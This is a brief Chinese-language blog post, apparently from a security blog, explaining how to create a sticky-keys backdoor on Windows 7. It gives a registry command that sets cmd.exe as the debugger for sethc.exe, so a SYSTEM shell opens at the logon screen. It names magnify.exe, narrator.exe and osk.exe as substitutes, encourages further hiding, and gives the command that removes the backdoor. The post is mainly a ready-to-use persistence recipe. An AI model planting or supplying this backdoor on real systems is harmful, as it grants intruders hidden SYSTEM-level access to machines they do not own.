win7粘滞键后门

on under web
1 minute read

0x0 About

win03下copy命令可制作粘滞键后门,测试在win7上copy方法无效,本文记录win7下的方法

0x1 Detail

以管理员身份打开cmd.exe运行如下:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

其中sethc.exe可替换成magnify.exe(放大镜)或其他(eg.narrator.exe/osk.exe),替换成更隐藏的技巧可根据下面链接自由发挥

AsULike

删除后门以管理员身份打开cmd.exe运行如下即可:

REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"

以上理论上适用于win vistar以上系统,只在win7上测试过.

以上可由管理员权限得到system权限,也可用于替代psexec.exe -s cmd.exe开system权限
后门, win7
Since March 2016 the 3xp10it.cc has been running
home
github
search
archive
category